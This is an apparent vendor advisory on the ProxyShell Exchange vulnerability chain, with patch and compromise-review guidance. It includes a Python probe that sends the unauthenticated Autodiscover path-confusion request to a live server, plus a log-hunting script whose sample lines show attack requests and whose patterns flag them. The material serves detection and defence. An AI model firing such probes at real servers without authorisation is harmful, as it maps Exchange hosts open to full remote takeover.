Microsoft Exchange - Remote Code Execution (ProxyShell - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
- Severity
- CVSSv3 Score
- 9.8
- Vulnerability description
Microsoft Exchange is vulnerable to CVE-2021-34473, a pre-authentication path confusion that leads to an ACL bypass in the Autodiscover endpoint of the Exchange Client Access Service (CAS). The root cause is the "Explicit Logon" feature: the frontend performs insufficient checks on the URL, so a crafted Autodiscover request is proxied to an arbitrary backend service in the context of the Exchange server itself, i.e. with administrative privileges. Chained with CVE-2021-34523 (elevation of privilege on the Exchange PowerShell backend, which lets the attacker run PowerShell cmdlets as a user of their choice) and CVE-2021-31207 (post-authentication arbitrary file write, e.g. through a mailbox export request), the attacker can write a file to an arbitrary path on the server. Together these yield unauthenticated Remote Code Execution on the Exchange server, an attack chain named ProxyShell.
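The following is an added example, not code from the original page or from the Sniper product: an unauthenticated check for the Autodiscover path confusion described above. The probe uses the Explicit Logon URL form, in which the frontend discards everything up to the "@" in the query and forwards the remainder ("/mapi/nspi/") to the backend in the server's own context; a patched server rejects the request, an unpatched one returns the backend's response. The host name, the probe domain and the response marker string are assumptions.

```python
"""Unauthenticated check for the ProxyShell path confusion (CVE-2021-34473).

Added example, not the page's or the vendor's code. Assumptions are marked.
"""
import ssl
import urllib.error
import urllib.request

# Assumption: the backend's reply to an NSPI request made in the server's
# own context contains this string, while a patched frontend answers with
# 401/403/404 before anything reaches the backend.
BACKEND_MARKER = b"Microsoft.Exchange"


def build_probe_path(domain: str = "test.com") -> str:
    """Build the Explicit Logon style Autodiscover URL that triggers the bug.

    The frontend normalises the path, drops the part before "@<domain>" and
    proxies "/mapi/nspi/" to the backend; the Email= parameter repeats the
    Autodiscover path so the request still passes the frontend's routing.
    """
    return (
        "/autodiscover/autodiscover.json?@{d}/mapi/nspi/?&"
        "Email=autodiscover/autodiscover.json%3F@{d}"
    ).format(d=domain)


def classify(status: int, body: bytes) -> str:
    """Turn an HTTP status/body pair into a verdict for the probe."""
    if status == 200 and BACKEND_MARKER in body:
        return "likely-vulnerable"      # backend answered through the proxy
    if status in (401, 403, 404):
        return "not-reachable-or-patched"
    return "inconclusive"


def probe(host: str, port: int = 443, timeout: float = 10.0) -> str:
    """Send the probe to a live host (Exchange often has a self-signed cert,
    so certificate validation is disabled for this check only)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = f"https://{host}:{port}{build_probe_path()}"
    req = urllib.request.Request(url, headers={"User-Agent": "proxyshell-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        # 4xx/5xx answers are still useful for the verdict
        return classify(err.code, err.read())


if __name__ == "__main__":
    import sys
    # usage: python proxyshell_check.py mail.example.com   (assumed host name)
    print(probe(sys.argv[1]))
```

A "likely-vulnerable" verdict means the frontend forwarded an unauthenticated request to the backend; confirm against the installed Exchange build before reporting, and only run the probe against systems you are authorised to test.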
- Risk description
The risk exists that a remote, unauthenticated attacker fully compromises the Exchange server and uses it to steal confidential information, install ransomware or pivot into the internal network.
- Exploit capabilities
Sniper can gain unauthenticated Remote Code Execution on the target system and extract multiple artefacts as evidence.
- Recommendation
Applying the latest Microsoft Security Update for the installed Exchange Server Cumulative Update fixes these vulnerabilities (CVE-2021-34473 and CVE-2021-34523 were addressed in the April 2021 Security Update, CVE-2021-31207 in the May 2021 Security Update; Security Updates only install on supported Cumulative Update levels). Furthermore, if the server was exposed to the Internet, there is a high probability that it has already been compromised by malicious actors. A review for indicators of compromise (suspicious Autodiscover requests in the IIS and HttpProxy logs, unexpected mailbox export requests, unknown .aspx files under the web root) must be performed before the server is considered trustworthy again.
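As an added example of the indicator-of-compromise review, not code from the original page or from the Sniper product, the script below scans IIS W3C log lines for the ProxyShell request shape: an Autodiscover request whose query starts with "@<domain>/" (the Explicit Logon path confusion), the backend it targets, and the X-Rps-CAT token used against the PowerShell backend. The log lines are constructed for the example; the field layout is the default IIS W3C format.

```python
"""Hunt IIS W3C logs for ProxyShell request patterns.

Added example, not the page's or the vendor's code. SAMPLE_LOG is constructed.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample: one legitimate Outlook Autodiscover call, two
# ProxyShell-style requests from the same external address, one OWA logon.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-10 09:12:01 10.0.0.5 POST /autodiscover/autodiscover.xml - 443 corp\\alice 10.0.0.77 Outlook/16.0 200
2021-08-10 09:13:44 10.0.0.5 GET /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 203.0.113.9 python-requests/2.25 200
2021-08-10 09:13:45 10.0.0.5 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=REDACTED&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 203.0.113.9 python-requests/2.25 200
2021-08-10 09:20:10 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.corp%2fowa 443 - 10.0.0.78 Mozilla/5.0 200
"""

# Query begins with "@<something>/": the Explicit Logon form abused by ProxyShell
PATH_CONFUSION = re.compile(r"^@[^/]*/")
# Backend paths seen in public ProxyShell activity (assumed list, extend as needed)
BACKEND_TARGETS = ("/powershell", "/mapi/nspi")


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C lines into dicts keyed by the names from the #Fields header."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # header may repeat on log rotation
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                        # malformed line: skip, do not crash
        rec = dict(zip(fields, values))
        rec["_line"] = str(lineno)
        records.append(rec)
    return records


def find_proxyshell_indicators(records: List[Dict[str, str]]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, client IP, reasons) for every suspicious record."""
    hits = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "")
        reasons: List[str] = []
        if stem.endswith("/autodiscover/autodiscover.json") and PATH_CONFUSION.match(query):
            reasons.append("Autodiscover path confusion (CVE-2021-34473)")
            for target in BACKEND_TARGETS:
                if target in query.lower():
                    reasons.append(f"backend target {target}")
        if "x-rps-cat=" in query.lower():
            reasons.append("PowerShell backend impersonation token (CVE-2021-34523)")
        if reasons:
            hits.append((int(rec["_line"]), rec.get("c-ip", "?"), reasons))
    return hits


if __name__ == "__main__":
    for line_no, client, why in find_proxyshell_indicators(parse_iis_log(SAMPLE_LOG)):
        print(f"line {line_no} from {client}: {'; '.join(why)}")
```

Run it over the real files under the IIS log directory of each Exchange server, then cross-check any hit with the Exchange Management Shell (for example Get-MailboxExportRequest for export jobs you did not create) and with a listing of recently written .aspx files under the web root.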
- References
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207
- Codename
- ProxyShell
- Detectable with
- Network Scanner
- Exploitable with Sniper
- Yes
- Vuln date
- Aug 2021
- Published at
- Updated at
- Software Type
- Email server
- Vendor
- Microsoft
- Product
- Exchange Server